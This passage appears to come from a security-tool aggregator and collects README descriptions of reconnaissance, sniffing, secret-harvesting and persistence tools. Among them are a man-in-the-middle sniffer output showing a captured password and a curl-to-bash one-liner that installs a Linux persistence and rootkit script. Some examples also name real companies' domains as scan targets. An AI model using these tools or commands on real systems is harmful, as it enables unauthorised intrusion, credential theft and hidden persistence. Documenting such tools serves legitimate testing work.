checkrpc     [NORM] Enumerate RPC status of linked servers [I,L]
clr          [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
columns      [NORM] Enumerate columns within a table [I,L]
databases    [NORM] Enumerate databases on a server [I,L]
disableclr   [PRIV] Disable CLR integration [I,L]
disableole   [PRIV] Disable OLE automation procedures [I,L]
disablerpc   [PRIV] Disable RPC and RPC Out on linked server [I]
disablexp    [PRIV] Disable xp_cmdshell [I,L]
enableclr    [PRIV] Enable CLR integration [I,L]
enableole    [PRIV] Enable OLE automation procedures [I,L]
enablerpc    [PRIV] Enable RPC and RPC Out on linked server [I]
enablexp     [PRIV] Enable xp_cmdshell [I,L]
impersonate  [NORM] Enumerate users that can be impersonated
info         [NORM] Gather information about the SQL server
links        [NORM] Enumerate linked servers [I,L]
olecmd       [PRIV] Execute a system command using OLE automation procedures [I,L]
query        [NORM] Execute a custom SQL query [I,L]
rows         [NORM] Get the count of rows in a table [I,L]
search       [NORM] Search a table for a column name [I,L]
smb          [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
tables       [NORM] Enumerate tables within a database [I,L]
users        [NORM] Enumerate users with database access [I,L]
whoami       [NORM] Gather logged in user, mapped user and roles [I,L]
xpcmd        [PRIV] Execute a system command using xp_cmdshell [I,L]

Usage

PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:

pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]

View global options:

pysqlrecon --help

View command specific options:

pysqlrecon [GLOBAL_OPTS] COMMAND --help

Change the database you authenticate to, or the one used in certain PySQLRecon commands (query, tables, columns, rows), with the --database flag.

Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.

Impersonate a user account while running a PySQLRecon command with the --impersonate flag.

--link and --impersonate are incompatible.

Development

pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:

git clone https://github.com/tw1sm/pysqlrecon
cd pysqlrecon
poetry install
poetry run pysqlrecon --help

Adding a Command

PySQLRecon is easily extensible - see the template and instructions in resources

TODO

  • Add SQLRecon SCCM commands
  • Add Azure SQL DB support?

References and Credits



PacketSpy - Powerful Network Packet Sniffing Tool Designed To Capture And Analyze Network Traffic

By: Zion3R


PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.


Features

  • Packet Capture: Capture and analyze network packets in real-time.
  • HTTP Inspection: Inspect HTTP requests and responses for detailed analysis.
  • Raw Payload Viewing: View raw payload data for deeper investigation.
  • Device Information: Gather information about network devices, including IP addresses and MAC addresses.

Installation

git clone https://github.com/HalilDeniz/PacketSpy.git

Requirements

PacketSpy requires the following dependencies to be installed:

pip install -r requirements.txt

Getting Started

To get started with PacketSpy, use the following command-line options:

root@denizhalil:/PacketSpy# python3 packetspy.py --help                          
usage: packetspy.py [-h] [-t TARGET_IP] [-g GATEWAY_IP] [-i INTERFACE] [-tf TARGET_FIND] [--ip-forward] [-m METHOD]

options:
-h, --help show this help message and exit
-t TARGET_IP, --target TARGET_IP
Target IP address
-g GATEWAY_IP, --gateway GATEWAY_IP
Gateway IP address
-i INTERFACE, --interface INTERFACE
Interface name
-tf TARGET_FIND, --targetfind TARGET_FIND
Target IP range to find
--ip-forward, -if Enable packet forwarding
-m METHOD, --method METHOD
Limit sniffing to a specific HTTP method

Examples

  1. Device Detection
root@denizhalil:/PacketSpy# python3 packetspy.py -tf 10.0.2.0/24 -i eth0

Device discovery
**************************************
Ip Address Mac Address
**************************************
10.0.2.1 52:54:00:12:35:00
10.0.2.2 52:54:00:12:35:00
10.0.2.3 08:00:27:78:66:95
10.0.2.11 08:00:27:65:96:cd
10.0.2.12 08:00:27:2f:64:fe

  2. Man-in-the-Middle Sniffing
root@denizhalil:/PacketSpy# python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
******************* started sniff *******************

HTTP Request:
Method: b'POST'
Host: b'testphp.vulnweb.com'
Path: b'/userinfo.php'
Source IP: 10.0.2.20
Source MAC: 08:00:27:04:e8:82
Protocol: HTTP
User-Agent: b'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0'

Raw Payload:
b'uname=admin&pass=mysecretpassword'

HTTP Response:
Status Code: b'302'
Content Type: b'text/html; charset=UTF-8'
--------------------------------------------------

FootNote

HTTPS support is still a work in progress.

Contributing

Contributions are welcome! To contribute to PacketSpy, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about PacketSpy, please feel free to contact me:

License

PacketSpy is released under the MIT License. See LICENSE for more information.



APIDetector - Efficiently Scan For Exposed Swagger Endpoints Across Web Domains And Subdomains

By: Zion3R


APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains with unique smart capabilities to detect false-positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.


Features

  • Flexible Input: Accepts a single domain or a list of subdomains from a file.
  • Multiple Protocols: Option to test endpoints over both HTTP and HTTPS.
  • Concurrency: Utilizes multi-threading for faster scanning.
  • Customizable Output: Save results to a file or print to stdout.
  • Verbose and Quiet Modes: Default verbose mode for detailed logs, with an option for quiet mode.
  • Custom User-Agent: Ability to specify a custom User-Agent for requests.
  • Smart Detection of False-Positives: Ability to detect most false-positives.

Getting Started

Prerequisites

Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.

Installation

Clone the APIDetector repository to your local machine using:

git clone https://github.com/brinhosa/apidetector.git
cd apidetector
pip install requests

Usage

Run APIDetector using the command line. Here are some usage examples:

  • Common usage, scan with 30 threads a list of subdomains using a Chrome user-agent and save the results in a file:

    python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
  • To scan a single domain:

    python apidetector.py -d example.com
  • To scan multiple domains from a file:

    python apidetector.py -i input_file.txt
  • To specify an output file:

    python apidetector.py -i input_file.txt -o output_file.txt
  • To use a specific number of threads:

    python apidetector.py -i input_file.txt -t 20
  • To scan with both HTTP and HTTPS protocols:

    python apidetector.py -m -d example.com
  • To run the script in quiet mode (suppress verbose output):

    python apidetector.py -q -d example.com
  • To run the script with a custom user-agent:

    python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"

Options

  • -d, --domain: Single domain to test.
  • -i, --input: Input file containing subdomains to test.
  • -o, --output: Output file to write valid URLs to.
  • -t, --threads: Number of threads to use for scanning (default is 10).
  • -m, --mixed-mode: Test both HTTP and HTTPS protocols.
  • -q, --quiet: Disable verbose output (default mode is verbose).
  • -ua, --user-agent: Custom User-Agent string for requests.

RISK DETAILS OF EACH ENDPOINT APIDETECTOR FINDS

Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list of the endpoints APIDetector scans, based on potential risk levels, with similar endpoints grouped together:

1. High-Risk Endpoints (Direct API Documentation):

  • Endpoints:
    • '/swagger-ui.html', '/swagger-ui/', '/swagger-ui/index.html', '/api/swagger-ui.html', '/documentation/swagger-ui.html', '/swagger/index.html', '/api/docs', '/docs', '/api/swagger-ui', '/documentation/swagger-ui'
  • Risk:
    • These endpoints typically serve the Swagger UI interface, which provides a complete overview of all API endpoints, including request formats, query parameters, and sometimes even example requests and responses.
    • Risk Level: High. Exposing these gives potential attackers detailed insights into your API structure and potential attack vectors.

2. Medium-High Risk Endpoints (API Schema/Specification):

  • Endpoints:
    • '/openapi.json', '/swagger.json', '/api/swagger.json', '/swagger.yaml', '/swagger.yml', '/api/swagger.yaml', '/api/swagger.yml', '/api.json', '/api.yaml', '/api.yml', '/documentation/swagger.json', '/documentation/swagger.yaml', '/documentation/swagger.yml'
  • Risk:
    • These endpoints provide raw Swagger/OpenAPI specification files. They contain detailed information about the API endpoints, including paths, parameters, and sometimes authentication methods.
    • Risk Level: Medium-High. While they require more interpretation than the UI interfaces, they still reveal extensive information about the API.

3. Medium Risk Endpoints (API Documentation Versions):

  • Endpoints:
    • '/v2/api-docs', '/v3/api-docs', '/api/v2/swagger.json', '/api/v3/swagger.json', '/api/v1/documentation', '/api/v2/documentation', '/api/v3/documentation', '/api/v1/api-docs', '/api/v2/api-docs', '/api/v3/api-docs', '/swagger/v2/api-docs', '/swagger/v3/api-docs', '/swagger-ui.html/v2/api-docs', '/swagger-ui.html/v3/api-docs', '/api/swagger/v2/api-docs', '/api/swagger/v3/api-docs'
  • Risk:
    • These endpoints often refer to version-specific documentation or API descriptions. They reveal information about the API's structure and capabilities, which could aid an attacker in understanding the API's functionality and potential weaknesses.
    • Risk Level: Medium. These might not be as detailed as the complete documentation or schema files, but they still provide useful information for attackers.

4. Lower Risk Endpoints (Configuration and Resources):

  • Endpoints:
    • '/swagger-resources', '/swagger-resources/configuration/ui', '/swagger-resources/configuration/security', '/api/swagger-resources', '/api.html'
  • Risk:
    • These endpoints often provide auxiliary information, configuration details, or resources related to the API documentation setup.
    • Risk Level: Lower. They may not directly reveal API endpoint details but can give insights into the configuration and setup of the API documentation.

Summary:

  • Highest Risk: Directly exposing interactive API documentation interfaces.
  • Medium-High Risk: Exposing raw API schema/specification files.
  • Medium Risk: Version-specific API documentation.
  • Lower Risk: Configuration and resource files for API documentation.
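If you want to double-check a hit by hand, a few of the endpoints listed above can be probed with curl; example.com and the sample paths below are placeholders:

# Print the HTTP status code for a sample of the documented endpoints
for path in /swagger-ui.html /openapi.json /v3/api-docs; do
  curl -s -o /dev/null -w "%{http_code} $path\n" "https://example.com$path"
done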

Recommendations:

  • Access Control: Ensure that these endpoints are not publicly accessible or are at least protected by authentication mechanisms.
  • Environment-Specific Exposure: Consider exposing detailed API documentation only in development or staging environments, not in production.
  • Monitoring and Logging: Monitor access to these endpoints and set up alerts for unusual access patterns.

Contributing

Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.

Legal Disclaimer

The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.

License

This project is licensed under the MIT License.

Acknowledgments



NetProbe - Network Probe

By: Zion3R


NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

Features

  • Scan for devices on a specified IP address or subnet
  • Display the IP address, MAC address, manufacturer, and device model of discovered devices
  • Live tracking of devices (optional)
  • Save scan results to a file (optional)
  • Filter by manufacturer (e.g., 'Apple') (optional)
  • Filter by IP range (e.g., '192.168.1.0/24') (optional)
  • Scan rate in seconds (default: 5) (optional)

Download

You can download the program from the GitHub page.

$ git clone https://github.com/HalilDeniz/NetProbe.git

Installation

To install the required libraries, run the following command:

$ pip install -r requirements.txt

Usage

To run the program, use the following command:

$ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
  • -h, --help: show this help message and exit
  • -t, --target: Target IP address or subnet (default: 192.168.1.0/24)
  • -i, --interface: Interface to use (default: None)
  • -l, --live: Enable live tracking of devices
  • -o, --output: Output file to save the results
  • -m, --manufacturer: Filter by manufacturer (e.g., 'Apple')
  • -r, --ip-range: Filter by IP range (e.g., '192.168.1.0/24')
  • -s, --scan-rate: Scan rate in seconds (default: 5)

Example:

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

Help Menu

$ python3 netprobe.py --help                      
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

NetProbe: Network Scanner Tool

options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)

Default Scan

$ python3 netprobe.py 

Live Tracking

You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

Save Results

You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
┡━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 192.168.1.1  │ **:6e:**:97:**:28 │ 102         │ ASUSTek COMPUTER INC.        │
│ 192.168.1.3  │ 00:**:22:**:12:** │ 102         │ InPro Comm                   │
│ 192.168.1.2  │ **:32:**:bf:**:00 │ 102         │ Xiaomi Communications Co Ltd │
│ 192.168.1.98 │ d4:**:64:**:5c:** │ 102         │ ASUSTek COMPUTER INC.        │
│ 192.168.1.25 │ **:49:**:00:**:38 │ 102         │ Unknown                      │
└──────────────┴───────────────────┴─────────────┴──────────────────────────────┘
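The filter options can be combined with any scan. As a sketch using the documented -m and -s flags, this limits results to one manufacturer and slows the scan rate to 10 seconds:

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -m 'Apple' -s 10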

Contact

If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

License

This program is released under the MIT LICENSE. See LICENSE for more information.



AcuAutomate - Unofficial Acunetix CLI Tool For Automated Pentesting And Bug Hunting Across Large Scopes

By: Zion3R


AcuAutomate is an unofficial Acunetix CLI tool that simplifies automated pentesting and bug hunting across extensive targets. It's a valuable aid during large-scale pentests, enabling the easy launch or stoppage of multiple Acunetix scans simultaneously. Additionally, its versatile functionality seamlessly integrates into enumeration wrappers or one-liners, offering efficient control through its pipeline capabilities.


Installation

git clone https://github.com/danialhalo/AcuAutomate.git
cd AcuAutomate
chmod +x AcuAutomate.py
pip3 install -r requirements.txt

Configuration (config.json)

Before using AcuAutomate, you need to set up the configuration file config.json inside the AcuAutomate folder:

{
"url": "https://localhost",
"port": 3443,
"api_key": "API_KEY"
}
  • The url and port parameters are set to the default Acunetix settings; however, they can be changed depending on your Acunetix configuration.
  • Replace API_KEY with your Acunetix API key. The key can be obtained from the user profile at https://localhost:3443/#/profile

Usage

The help parameter (-h) can be used to access more detailed help for specific actions.

    		                               __  _                 ___
____ ________ ______ ___ / /_(_) __ _____/ (_)
/ __ `/ ___/ / / / __ \/ _ \/ __/ / |/_/_____/ ___/ / /
/ /_/ / /__/ /_/ / / / / __/ /_/ /> </_____/ /__/ / /
\__,_/\___/\__,_/_/ /_/\___/\__/_/_/|_| \___/_/_/

-: By Danial Halo :-


usage: AcuAutomate.py [-h] {scan,stop} ...

Launch or stop a scan using Acunetix API

positional arguments:
{scan,stop} Action to perform
scan Launch a scan use scan -h
stop Stop a scan

options:
-h, --help show this help message and exit

Scan Actions

For launching the scan you need to use the scan actions:

xubuntu:~/AcuAutomate$ ./AcuAutomate.py scan -h

usage: AcuAutomate.py scan [-h] [-p] [-d DOMAIN] [-f FILE]
[-t {full,high,weak,crawl,xss,sql}]

options:
-h, --help show this help message and exit
-p, --pipe Read from pipe
-d DOMAIN, --domain DOMAIN
Domain to scan
-f FILE, --file FILE File containing list of URLs to scan
-t {full,high,weak,crawl,xss,sql}, --type {full,high,weak,crawl,xss,sql}
High Risk Vulnerabilities Scan, Weak Password Scan, Crawl Only,
XSS Scan, SQL Injection Scan, Full Scan (by default)

Scanning Single Target

The domain can be provided with the -d flag for a single-site scan:

./AcuAutomate.py scan -d https://www.google.com

Scanning Multiple Targets

To scan multiple domains, add the domains to a file and then specify the file name with the -f flag:

./AcuAutomate.py scan -f domains.txt

Pipeline

AcuAutomate can also work with piped input via the -p flag:

cat domain.txt | ./AcuAutomate.py scan -p

This is great, as it enables AcuAutomate to work with other tools. For example, we can use subfinder and httpx, then pipe the output to AcuAutomate for mass scanning with Acunetix:

subfinder -silent -d google.com | httpx -silent | ./AcuAutomate.py scan -p

Scan Type

The -t flag can be used to define the scan type. For example, the following scan will only detect SQL injection vulnerabilities:

./AcuAutomate.py scan -d https://www.google.com -t sql

Note

AcuAutomate only accepts domains prefixed with http:// or https://

Stop Action

The stop action can be used to stop scans, either with the -d flag to stop a scan by specifying its domain, or with the -a flag to stop all running scans.

xubuntu:~/AcuAutomate$ ./AcuAutomate.py stop -h


__ _ ___
____ ________ ______ ___ / /_(_) __ _____/ (_)
/ __ `/ ___/ / / / __ \/ _ \/ __/ / |/_/_____/ ___/ / /
/ /_/ / /__/ /_/ / / / / __/ /_/ /> </_____/ /__/ / /
\__,_/\___/\__,_/_/ /_/\___/\__/_/_/|_| \___/_/_/

-: By Danial Halo :-


usage: AcuAutomate.py stop [-h] [-d DOMAIN] [-a]

options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Domain of the scan to stop
-a, --all Stop all Running Scans
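For example, to stop the scan for a single domain, or all running scans at once:

./AcuAutomate.py stop -d https://www.google.com
./AcuAutomate.py stop -a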

Contact

Please submit any bugs, issues, questions, or feature requests under "Issues" or send them to me on Twitter. @DanialHalo



Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

By: Zion3R


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proofs of concept, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration of recon beyond secrets. We realized we required capabilities that were "secret-agnostic", with enough flexibility to capture false-positives that still provided offensive value.

Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

  • Workspaces
  • Collections
  • Requests
  • Users
  • Teams

Installation

python3 -m pip install porch-pirate

Using the client

The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

  • --globals
  • --collections
  • --requests
  • --urls
  • --dump
  • --raw
  • --curl

Simple Search

porch-pirate -s "coca-cola.com"

Get Workspace Globals

By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

Dump Workspace

When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

Automatic Search and Globals Extraction

Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

porch-pirate -s "shopify" --globals

Automatic Search Dump

Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

porch-pirate -s "coca-cola.com" --dump

Extract URLs from Workspace

A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

Automatic URL Extraction

Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

porch-pirate -s "coca-cola.com" --urls

Show Collections in a Workspace

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

Show Workspace Requests

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

Show raw JSON

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

Show Entity Information

porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME

Convert Request to Curl

Porch Pirate can build curl requests when provided with a request ID for easier testing.

porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

Use a proxy

porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

Using as a library

Searching

from porchpirate import porchpirate

p = porchpirate()
print(p.search('coca-cola.com'))

Get Workspace Collections

from porchpirate import porchpirate

p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Dumping a Workspace

import json

from porchpirate import porchpirate

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
        request_data = p.request(r['id'])
        print(request_data)

Grabbing a Workspace's Globals

from porchpirate import porchpirate

p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Other Examples

Other library usage examples can be located in the examples directory, which contains the following examples:

  • dump_workspace.py
  • format_search_results.py
  • format_workspace_collections.py
  • format_workspace_globals.py
  • get_collection.py
  • get_collections.py
  • get_profile.py
  • get_request.py
  • get_statistics.py
  • get_team.py
  • get_user.py
  • get_workspace.py
  • recursive_globals_from_search.py
  • request_to_curl.py
  • search.py
  • search_by_page.py
  • workspace_collections.py


C2-Search-Netlas - Search For C2 Servers Based On Netlas

By: Zion3R

C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.



Usage

To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.

After acquiring your API key, execute the following command to search servers:

c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]

Replace <TARGET_DOMAIN> with the desired IP address or domain, <TARGET_PORT> with the port you wish to scan, and <API_KEY> with your Netlas API key. Use the optional -v flag for verbose output. For example, to scan google.com on port 443 using the Netlas API key 1234567890abcdef, enter:

c2detect -t google.com -p 443 -s 1234567890abcdef

Release

To download a release of the utility, follow these steps:

  • Visit the repository's releases page on GitHub.
  • Download the latest release file (typically a JAR file) to your local machine.
  • In a terminal, navigate to the directory containing the JAR file.
  • Execute the following command to initiate the utility:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

Docker

To build and start the Docker container for this project, run the following commands:

docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \
-v

Source

To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:

./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help

This will display the help message with available options. To search for C2 servers, run the following command:

java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

This will display a list of C2 servers found in the given IP address or domain.

Support

Name Support
Metasploit
Havoc
Cobalt Strike
Bruteratel
Sliver
DeimosC2
PhoenixC2
Empire
Merlin
Covenant
Villain
Shad0w
PoshC2

Legend:

  • ✅ - Accept/good support
  • ❓ - Support unknown/unclear
  • ❌ - No support/poor support

Contributing

If you'd like to contribute to this project, please feel free to create a pull request.

License

This project is licensed under the License - see the LICENSE file for details.



DynastyPersist - A Linux Persistence Tool!

By: Zion3R


  • A Linux persistence tool!

  • A powerful and versatile Linux persistence script designed for various security assessment and testing scenarios. This script provides a collection of features that demonstrate different methods of achieving persistence on a Linux system.


Features

  1. SSH Key Generation: Automatically generates SSH keys for covert access.

  2. Cronjob Persistence: Sets up cronjobs for scheduled persistence.

  3. Custom User with Root: Creates a custom user with root privileges.

  4. RCE Persistence: Achieves persistence through remote code execution.

  5. LKM/Rootkit: Demonstrates Linux Kernel Module (LKM) based rootkit persistence.

  6. Bashrc Persistence: Modifies user-specific shell initialization files for persistence.

  7. Systemd Service for Root: Sets up a systemd service for achieving root persistence.

  8. LD_PRELOAD Privilege Escalation Config: Configures LD_PRELOAD for privilege escalation.

  9. Backdooring Message of the Day / Header: Backdoors system message display for covert access.

  10. Modify an Existing Systemd Service: Manipulates an existing systemd service for persistence.

Usage

  1. Clone this repository to your local machine:

    git clone https://github.com/Trevohack/DynastyPersist.git
  2. One-liner

    curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

Support

For support, email spaceshuttle.io.all@gmail.com or join our Discord server.

  • Discord: https://discord.gg/WYzu65Hp

Thank You!



Iac-Scan-Runner - Service That Scans Your Infrastructure As Code For Common Vulnerabilities

By: Zion3R


Service that scans your Infrastructure as Code for common vulnerabilities.

Aspect Information
Tool name IaC Scan Runner
Docker image xscanner/runner
PyPI package iac-scan-runner
Documentation docs
Contact us xopera@xlab.si

Purpose and description

The IaC Scan Runner is a REST API service used to scan IaC (Infrastructure as Code) package and perform various code checks in order to find possible vulnerabilities and improvements. Explore the docs for more info.

Running

This section explains how to run the REST API.

Run with Docker

You can run the REST API using a public xscanner/runner Docker image as follows:

# run IaC Scan Runner REST API in a Docker container and 
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 xscanner/runner

Or you can build the image locally and run it as follows:

# build Docker container (it will take some time) 
$ docker build -t iac-scan-runner .
# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 iac-scan-runner

Run from CLI

To run using the IaC Scan Runner CLI:

# install the CLI
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install iac-scan-runner
# print OpenAPI specification
(.venv) $ iac-scan-runner openapi
# install prerequisites
(.venv) $ iac-scan-runner install
# run IaC Scan Runner REST API
(.venv) $ iac-scan-runner run

Run from source

To run locally from source:

# Export env variables 
export MONGODB_CONNECTION_STRING=mongodb://localhost:27017
export SCAN_PERSISTENCE=enabled
export USER_MANAGEMENT=enabled

# Setup MongoDB
$ docker run --name mongodb -p 27017:27017 mongo

# install prerequisites
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install -r requirements.txt
(.venv) $ ./install-checks.sh
# run IaC Scan Runner REST API (add --reload flag to apply code changes on the way)
(.venv) $ uvicorn src.iac_scan_runner.api:app

Usage and examples

This part will show one of the possible deployments and short examples on how to use API calls.

Firstly we will clone the iac scan runner repository and run the API.

$ git clone https://github.com/xlab-si/iac-scan-runner.git
$ docker compose up

After this is done you can use different API endpoints by calling localhost:8000. You can also navigate to localhost:8000/swagger or localhost:8000/redoc and test all the API endpoints there. In this example, we will use curl for calling API endpoints.

  1. Let's create a project named test.
curl -X 'POST' \
'http://0.0.0.0:8000/project?creator_id=test' \
-H 'accept: application/json' \
-d ''

The project ID will be returned to us. For this example, the project ID is 1e7b2a91-2896-40fd-8d53-83db56088026.

  2. For example, let's say we want to initiate all checks except ansible-lint. Let's disable it.
curl -X 'PUT' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/checks/ansible-lint/disable' \
-H 'accept: application/json'
  3. Now that the project is configured, we can simply choose the files we want to scan and zip them. For IaC-Scan-Runner to work, files are expected to be compressed archives (usually zip files). In this case the response type will be json, but it is possible to change it to html. Please change YOUR.zip to the path of your file.
curl -X 'POST' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/scan?scan_response_type=json' \
-H 'accept: application/json' \
-H 'Content-Type: multipart/form-data' \
-F 'iac=@YOUR.zip;type=application/zip'
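To get an HTML report instead, the same scan call can be made with scan_response_type=html; a sketch reusing the project ID from above:

curl -X 'POST' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/scan?scan_response_type=html' \
-H 'accept: application/json' \
-H 'Content-Type: multipart/form-data' \
-F 'iac=@YOUR.zip;type=application/zip'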

That is it.

Extending the scan workflow with new check tools

At a certain point, it might be required to include new check tools within the scan workflow, with the aim of providing wider coverage of IaC standards and project types. This subsection therefore identifies and describes the sequence of steps required for that purpose. For now, the steps have to be performed manually as described below, but it is planned to automate this procedure in the future via the API and to provide a user-friendly interface that aids the user while importing new tools into the catalogue that makes up the scan workflow. The following four steps extend the scan workflow with a new tool.

Step 1 – Adding the tool-specific class to the checks directory

First, add a new tool-specific Python class to the checks directory inside IaC Scan Runner's source code: iac-scan-runner/src/iac_scan_runner/checks/new_tool.py
The class of a new tool inherits the existing Check class, which provides a generalization of the scan workflow tools. Moreover, it is necessary to provide implementations of the following methods:

  1. def configure(self, config_filename: Optional[str], secret: Optional[SecretStr])
  2. def run(self, directory: str)

The first one provides the tool-specific parameters needed to set it up (such as passwords, client IDs and tokens), while the second specifies how the tool itself is invoked via API or CLI and how its raw output is returned.

Step 2 – Adding the check tool class instance within the ScanRunner constructor

Once the new class derived from Check is added to the IaC Scan Runner's source code, it is also required to modify the source code of its main class, called ScanRunner. First, import the tool-specific class, then create a new check tool-specific class instance and add it to the dictionary of IaC checks inside def init_checks(self).

A. Import the check tool class:

